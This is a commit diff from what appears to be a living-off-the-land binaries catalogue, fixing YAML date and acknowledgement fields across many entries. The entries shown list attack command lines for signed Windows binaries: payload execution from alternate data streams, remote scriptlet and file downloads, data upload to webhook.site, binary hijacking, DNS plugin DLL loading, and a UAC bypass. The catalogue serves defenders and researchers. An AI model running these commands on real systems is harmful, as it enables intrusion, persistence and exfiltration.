Merge pull request #122 from wietze/fixing-yaml-issues

Fixing yaml issues
2024-10-23 00:58:42 +02:00 · 2021-10-22 14:56:14 +02:00 · 2021-10-22 14:56:14 +02:00 · 19a8d5ac08
commit 19a8d5ac08
parent 3b848e6121 a55e2249c1
149 changed files with 960 additions and 954 deletions
--- a/YML-Template.yml
+++ b/YML-Template.yml
@ -2,7 +2,7 @@
 Name: Binary.exe
 Description: Something general about the binary
 Author: The person that created this file
-Created: Date the person created this file
+Created: Date the person created this file (use YYYY-MM-DD without quotes)
 Commands:
  - Command: The command
    Description: Description of the command
@ -34,7 +34,7 @@ Resources:
  - Link: Threatintelreport...
 Acknowledgement:
  - Person: John Doe
-    Handle: @johndoe
+    Handle: '@johndoe'
  - Person: Ola Norman
-    Handle: @olaNor
+    Handle: '@olaNor'
 ---
--- a/yml/LOLUtilz/OSBinaries/Explorer.yml
+++ b/yml/LOLUtilz/OSBinaries/Explorer.yml
@ -2,8 +2,7 @@
 Name: Explorer.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: explorer.exe calc.exe
    Description: 'Executes calc.exe as a subprocess of explorer.exe.'
@ -14,5 +13,7 @@ Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/bohops/status/986984122563391488
-Notes: Thanks to Jimmy - @bohops
+Acknowledgement:
+  - Person: Jimmy
+    Handle: '@bohops'

--- a/yml/LOLUtilz/OSBinaries/Netsh.yml
+++ b/yml/LOLUtilz/OSBinaries/Netsh.yml
@ -2,8 +2,7 @@
 Name: Netsh.exe
 Description: Execute, Surveillance
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: |
          netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
@ -22,5 +21,3 @@ Resources:
  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
  - https://attack.mitre.org/wiki/Technique/T1128
  - https://twitter.com/teemuluotio/status/990532938952527873
-Notes: ''
-
--- a/yml/LOLUtilz/OSBinaries/Nltest.yml
+++ b/yml/LOLUtilz/OSBinaries/Nltest.yml
@ -2,8 +2,7 @@
 Name: Nltest.exe
 Description: Credentials
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: nltest.exe /SERVER:192.168.1.10 /QUERY
    Description: ''
@ -14,4 +13,6 @@ Detection: []
 Resources:
  - https://twitter.com/sysopfb/status/986799053668139009
  - https://ss64.com/nt/nltest.html
-Notes: Thanks to Sysopfb - @sysopfb
+Acknowledgement:
+  - Person: Sysopfb
+    Handle: '@sysopfb'
--- a/yml/LOLUtilz/OSBinaries/Openwith.yml
+++ b/yml/LOLUtilz/OSBinaries/Openwith.yml
@ -2,8 +2,7 @@
 Name: Openwith.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: OpenWith.exe /c C:\test.hta
    Description: Opens the target file with the default application.
@ -16,5 +15,6 @@ Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/harr0ey/status/991670870384021504
-Notes: Thanks to Matt harr0ey - @harr0ey
-
+Acknowledgement:
+  - Person: Matt harr0ey
+    Handle: '@harr0ey'
--- a/yml/LOLUtilz/OSBinaries/Powershell.yml
+++ b/yml/LOLUtilz/OSBinaries/Powershell.yml
@ -2,8 +2,7 @@
 Name: Powershell.exe
 Description: Execute, Read ADS
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: powershell -ep bypass - < c:\temp:ttt
    Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
@ -14,5 +13,7 @@ Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/Moriarty_Meng/status/984380793383370752
-Notes: Thanks to Moriarty - @Moriarty_Meng
+Acknowledgement:
+  - Person: Moriarty
+    Handle: '@Moriarty_Meng'

--- a/yml/LOLUtilz/OSBinaries/Psr.yml
+++ b/yml/LOLUtilz/OSBinaries/Psr.yml
@ -2,8 +2,7 @@
 Name: Psr.exe
 Description: Surveillance
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: psr.exe /start /gui 0 /output c:\users\user\out.zip
    Description: Capture screenshots of the desktop and save them in the target .ZIP file.
@ -18,5 +17,4 @@ Code_Sample: []
 Detection: []
 Resources:
  - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
-Notes: 'Thanks to '

--- a/yml/LOLUtilz/OSBinaries/Robocopy.yml
+++ b/yml/LOLUtilz/OSBinaries/Robocopy.yml
@ -2,8 +2,7 @@
 Name: Robocopy.exe
 Description: Copy
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: Robocopy.exe C:\SourceFolder C:\DestFolder
    Description: Copy the entire contents of the SourceFolder to the DestFolder.
@ -16,5 +15,3 @@ Code_Sample: []
 Detection: []
 Resources:
  - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
-Notes: Thanks to Name of guy - @twitterhandle
-
--- a/yml/LOLUtilz/OtherBinaries/AcroRd32.yml
+++ b/yml/LOLUtilz/OtherBinaries/AcroRd32.yml
@ -2,8 +2,7 @@
 Name: AcroRd32.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
    Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
@ -13,4 +12,6 @@ Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/pabraeken/status/997997818362155008
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
--- a/yml/LOLUtilz/OtherBinaries/Gpup.yml
+++ b/yml/LOLUtilz/OtherBinaries/Gpup.yml
@ -2,8 +2,7 @@
 Name: Gpup.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
    Description: Execute another command through gpup.exe (Notepad++ binary).
@ -13,4 +12,6 @@ Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/pabraeken/status/997892519827558400
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
--- a/yml/LOLUtilz/OtherBinaries/Nlnotes.yml
+++ b/yml/LOLUtilz/OtherBinaries/Nlnotes.yml
@ -2,8 +2,7 @@
 Name: Nlnotes.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
    Description: Run PowerShell via LotusNotes.
@ -14,4 +13,6 @@ Detection: []
 Resources:
  - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
  - https://twitter.com/HanseSecure/status/995578436059127808
-Notes: Thanks to Daniel Bohannon - @danielhbohannon
+Acknowledgement:
+  - Person: Daniel Bohannon
+    Handle: '@danielhbohannon'
--- a/yml/LOLUtilz/OtherBinaries/Notes.yml
+++ b/yml/LOLUtilz/OtherBinaries/Notes.yml
@ -2,8 +2,7 @@
 Name: Notes.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
    Description: Run PowerShell via LotusNotes.
@ -14,4 +13,6 @@ Detection: []
 Resources:
  - https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
  - https://twitter.com/HanseSecure/status/995578436059127808
-Notes: Thanks to Daniel Bohannon - @danielhbohannon
+Acknowledgement:
+  - Person: Daniel Bohannon
+    Handle: '@danielhbohannon'
--- a/yml/LOLUtilz/OtherBinaries/Nvudisp.yml
+++ b/yml/LOLUtilz/OtherBinaries/Nvudisp.yml
@ -2,8 +2,7 @@
 Name: Nvudisp.exe
 Description: Execute, Copy, Add registry, Create shortcut, kill process
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: Nvudisp.exe System calc.exe
    Description: Execute calc.exe as a subprocess.
@ -23,4 +22,7 @@ Code_Sample: []
 Detection: []
 Resources:
  - http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
+
--- a/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml
+++ b/yml/LOLUtilz/OtherBinaries/Nvuhda6.yml
@ -2,8 +2,7 @@
 Name: Nvuhda6.exe
 Description: Execute, Copy, Add registry, Create shortcut, kill process
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: nvuhda6.exe System calc.exe
    Description: Execute calc.exe as a subprocess.
@ -23,4 +22,6 @@ Code_Sample: []
 Detection: []
 Resources:
  - http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
-Notes: Thanks to Adam - @hexacorn
+Acknowledgement:
+  - Person: Adam
+    Handle: '@hexacorn'
--- a/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml
+++ b/yml/LOLUtilz/OtherBinaries/ROCCAT_Swarm.yml
@ -2,8 +2,7 @@
 Name: ROCCAT_Swarm.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
    Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
@ -13,4 +12,6 @@ Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/pabraeken/status/994213164484001793
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
--- a/yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml
+++ b/yml/LOLUtilz/OtherBinaries/RunCmd_X64.yml
@ -21,7 +21,7 @@ Detection:
 Resources:
 - Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
 - Link: https://twitter.com/bartblaze/status/1107390776147881984
- Acknowledgement:
+Acknowledgement:
  - Person: Bart
-    Handle: @bartblaze
+    Handle: '@bartblaze'
 ---
--- a/yml/LOLUtilz/OtherBinaries/Setup.yml
+++ b/yml/LOLUtilz/OtherBinaries/Setup.yml
@ -2,8 +2,7 @@
 Name: Setup.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: Run Setup.exe
    Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
@ -13,4 +12,6 @@ Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/pabraeken/status/994381620588236800
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
--- a/yml/LOLUtilz/OtherBinaries/Usbinst.yml
+++ b/yml/LOLUtilz/OtherBinaries/Usbinst.yml
@ -2,8 +2,7 @@
 Name: Usbinst.exe
 Description: Execute
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
    Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
@ -13,4 +12,6 @@ Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/pabraeken/status/993514357807108096
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
--- a/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml
+++ b/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml
@ -2,8 +2,7 @@
 Name: VBoxDrvInst.exe
 Description: Persistence
 Author: ''
-Created: '2018-05-25'
-Categories: []
+Created: 2018-05-25
 Commands:
  - Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
    Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
@ -13,4 +12,6 @@ Code_Sample: []
 Detection: []
 Resources:
  - https://twitter.com/pabraeken/status/993497996179492864
-Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
+Acknowledgement:
+  - Person: Pierre-Alexandre Braeken
+    Handle: '@pabraeken'
--- a/yml/LOLUtilz/OtherBinaries/aswrundll.yml
+++ b/yml/LOLUtilz/OtherBinaries/aswrundll.yml
@ -1,20 +1,18 @@
 Name: aswrundll.exe
 Description: This process is used by AVAST antivirus to run and execute any modules
 Author: Eli Salem
-Created: 19\03\2019
+Created: 2019-03-19
 Commands:
-  - Command: "C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" 
+  - Command: "\"C:\\Program Files\\Avast Software\\Avast\\aswrundll\" \"C:\\Users\\Public\\Libraries\\tempsys\\module.dll\""
    Description: Load and execute modules using aswrundll
    Usecase: Execute malicious modules using aswrundll.exe
    Category: Execute
    Privileges: Any
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
- Path: C:\Program Files\Avast Software\Avast\aswrundll
-Code_Sample: 
- Code: ["C:\Program Files\Avast Software\Avast\aswrundll" "C:\Users\Public\Libraries\tempsys\module.dll" "C:\Users\module.dll"]
+  - Path: C:\Program Files\Avast Software\Avast\aswrundll
 Resources:
- - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
- Acknowledgement:
+  - Link: https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
+Acknowledgement:
  - Person: Eli Salem 
-    handle: https://www.linkedin.com/in/eli-salem-954728150
+    Handle: https://www.linkedin.com/in/eli-salem-954728150
--- a/yml/LOLUtilz/OtherMSBinaries/Winword.yml
+++ b/yml/LOLUtilz/OtherMSBinaries/Winword.yml
@ -2,7 +2,7 @@
 Name: winword.exe
 Description: Document editor included with Microsoft Office.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: winword.exe /l dllfile.dll
    Description: Launch DLL payload.
@ -10,7 +10,7 @@ Commands:
    Category: Execute
    Privileges: User
    MitreID: T1218
-    MItreLink: https://attack.mitre.org/wiki/Technique/T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
    OperatingSystem: Windows
 Full_Path:
  - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
--- a/yml/LOLUtilz/OtherScripts/Testxlst.yml
+++ b/yml/LOLUtilz/OtherScripts/Testxlst.yml
@ -2,18 +2,18 @@
 Name: testxlst.js
 Description: Script included with Pywin32.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
    Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
-    Categories: Execution
+    Category: Execution
    Privileges: User
    MitreID: T1064
    MitreLink: https://attack.mitre.org/wiki/Technique/T1064
    OperatingSystem: Windows
  - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
    Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
-    Categories: Execution
+    Category: Execution
    Privileges: User
    MitreID: T1064
    MitreLink: https://attack.mitre.org/wiki/Technique/T1064
@ -25,4 +25,6 @@ Detection: []
 Resources:
  - https://twitter.com/bohops/status/993314069116485632
  - https://github.com/mhammond/pywin32
-Notes: Thanks to Jimmy - @bohops
+Acknowledgement:
+  - Person: Jimmy
+    Handle: '@bohops'
--- a/yml/OSBinaries/At.yml
+++ b/yml/OSBinaries/At.yml
@ -2,7 +2,7 @@
 Name: At.exe
 Description: Schedule periodic tasks
 Author: 'Freddie Barr-Smith'
-Created: '2019-09-20'
+Created: 2019-09-20
 Commands:
  - Command: C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
    Description: Create a recurring task to execute every day at a specific time.
--- a/yml/OSBinaries/Atbroker.yml
+++ b/yml/OSBinaries/Atbroker.yml
@ -2,7 +2,7 @@
 Name: Atbroker.exe
 Description: Helper binary for Assistive Technology (AT)
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: ATBroker.exe /start malware
    Description: Start a registered Assistive Technology (AT).
--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@ -2,7 +2,7 @@
 Name: Bash.exe
 Description: File used by Windows subsystem for Linux
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: bash.exe -c calc.exe
    Description: Executes calc.exe from bash.exe
--- a/yml/OSBinaries/Bitsadmin.yml
+++ b/yml/OSBinaries/Bitsadmin.yml
@ -2,7 +2,7 @@
 Name: Bitsadmin.exe
 Description: Used for managing background intelligent transfer
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
    Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
--- a/yml/OSBinaries/Certreq.yml
+++ b/yml/OSBinaries/Certreq.yml
@ -2,7 +2,7 @@
 Name: CertReq.exe
 Description: Used for requesting and managing certificates
 Author: 'David Middlehurst'
-Created: '2020-07-07'
+Created: 2020-07-07
 Commands:
  - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
    Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@ -2,7 +2,7 @@
 Name: Certutil.exe
 Description: Windows binary used for handling certificates
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
    Description: Download and save 7zip to disk in the current folder.
--- a/yml/OSBinaries/Cmd.yml
+++ b/yml/OSBinaries/Cmd.yml
@ -2,7 +2,7 @@
 Name: Cmd.exe
 Description: The command-line interpreter in Windows
 Author: 'Ye Yint Min Thu Htut'
-Created: '2019-06-26'
+Created: 2019-06-26
 Commands:
  - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
    Description: Add content to an Alternate Data Stream (ADS).
--- a/yml/OSBinaries/Cmdkey.yml
+++ b/yml/OSBinaries/Cmdkey.yml
@ -2,7 +2,7 @@
 Name: Cmdkey.exe
 Description: creates, lists, and deletes stored user names and passwords or credentials.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: cmdkey /list
    Description: List cached credentials
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@ -2,7 +2,7 @@
 Name: Cmstp.exe
 Description: Installs or removes a Connection Manager service profile.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
    Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
--- a/yml/OSBinaries/ConfigSecurityPolicy.yml
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
@ -2,7 +2,7 @@
 Name: ConfigSecurityPolicy.exe
 Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
 Author: 'Ialle Teixeira'
-Created: '04/09/2020'
+Created: 2020-09-04
 Commands:
  - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
    Description: Upload file, credentials or data exfiltration in general
--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
@ -2,7 +2,7 @@
 Name: Control.exe
 Description: Binary used to launch controlpanel items in Windows
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: control.exe c:\windows\tasks\file.txt:evil.dll
    Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS).
--- a/yml/OSBinaries/Csc.yml
+++ b/yml/OSBinaries/Csc.yml
@ -2,7 +2,7 @@
 Name: Csc.exe
 Description: Binary file used by .NET to compile C# code
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: csc.exe -out:My.exe File.cs
    Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe.
--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@ -2,7 +2,7 @@
 Name: Cscript.exe
 Description: Binary used to execute scripts in Windows
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: cscript c:\ads\file.txt:script.vbs
    Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).
--- a/yml/OSBinaries/Desktopimgdownldr.yml
+++ b/yml/OSBinaries/Desktopimgdownldr.yml
@ -2,7 +2,7 @@
 Name: Desktopimgdownldr.exe
 Description: Windows binary used to configure lockscreen/desktop image
 Author: Gal Kristal
-Created: 28/06/2020
+Created: 2020-06-28
 Commands:
  - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
    Description: Downloads the file and sets it as the computer's lockscreen
--- a/yml/OSBinaries/Dfsvc.yml
+++ b/yml/OSBinaries/Dfsvc.yml
@ -2,7 +2,7 @@
 Name: Dfsvc.exe
 Description: ClickOnce engine in Windows used by .NET
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
    Description: Executes click-once-application from Url
--- a/yml/OSBinaries/Diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@ -2,7 +2,7 @@
 Name: Diantz.exe
 Description: Binary that package existing files into a cabinet (.cab) file
 Author: 'Tamir Yehuda'
-Created: '08/08/2020'
+Created: 2020-08-08
 Commands:
  - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
    Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
--- a/yml/OSBinaries/Diskshadow.yml
+++ b/yml/OSBinaries/Diskshadow.yml
@ -2,7 +2,7 @@
 Name: Diskshadow.exe
 Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: diskshadow.exe /s c:\test\diskshadow.txt
    Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
--- a/yml/OSBinaries/Dnscmd.yml
+++ b/yml/OSBinaries/Dnscmd.yml
@ -2,7 +2,7 @@
 Name: Dnscmd.exe
 Description: A command-line interface for managing DNS servers
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
    Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@ -2,7 +2,7 @@
 Name: Esentutl.exe
 Description: Binary for working with Microsoft Joint Engine Technology (JET) database
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
    Description: Copies the source VBS file to the destination VBS file.
--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@ -2,7 +2,7 @@
 Name: Eventvwr.exe
 Description: Displays Windows Event Logs in a GUI window.
 Author: 'Jacob Gajek'
-Created: '2018-11-01'
+Created: 2018-11-01
 Commands:
  - Command: eventvwr.exe
    Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
@ -15,7 +15,7 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\eventvwr.exe
  - Path: C:\Windows\SysWOW64\eventvwr.exe
-Code Sample:
+Code_Sample:
  - Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
 Detection:
 - IOC: eventvwr.exe launching child process other than mmc.exe
--- a/yml/OSBinaries/Expand.yml
+++ b/yml/OSBinaries/Expand.yml
@ -2,7 +2,7 @@
 Name: Expand.exe
 Description: Binary that expands one or more compressed files
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
    Description: Copies source file to destination.
--- a/yml/OSBinaries/Explorer.yml
+++ b/yml/OSBinaries/Explorer.yml
@ -2,7 +2,7 @@
 Name: Explorer.exe
 Description: Binary used for managing files and system components within Windows
 Author: 'Jai Minton'
-Created: '2020-06-24'
+Created: 2020-06-24
 Commands:
  - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
    Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
--- a/yml/OSBinaries/Extexport.yml
+++ b/yml/OSBinaries/Extexport.yml
@ -2,7 +2,7 @@
 Name: Extexport.exe
 Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: Extexport.exe c:\test foo bar
    Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
--- a/yml/OSBinaries/Extrac32.yml
+++ b/yml/OSBinaries/Extrac32.yml
@ -2,7 +2,7 @@
 Name: Extrac32.exe
 Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
    Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
--- a/yml/OSBinaries/Findstr.yml
+++ b/yml/OSBinaries/Findstr.yml
@ -2,7 +2,7 @@
 Name: Findstr.exe
 Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
    Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
@ -2,7 +2,7 @@
 Name: Forfiles.exe
 Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
  - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
    Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
--- a/yml/OSBinaries/Ftp.yml
+++ b/yml/OSBinaries/Ftp.yml
@ -2,7 +2,7 @@
 Name: Ftp.exe
 Description: A binary designed for connecting to FTP servers
 Author: 'Oddvar Moe'
-Created: '2018-12-10'
+Created: 2018-12-10
 Commands:
  - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
    Description: Executes the commands you put inside the text file.
--- a/yml/OSBinaries/GfxDownloadWrapper.yml
+++ b/yml/OSBinaries/GfxDownloadWrapper.yml
@ -2,7 +2,7 @@
 Name: GfxDownloadWrapper.exe
 Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
 Author: Jesus Galvez
-Created: Jesus Galvez
+Created: 2019-12-27
 Commands:
  - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
    Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@ -2,7 +2,7 @@
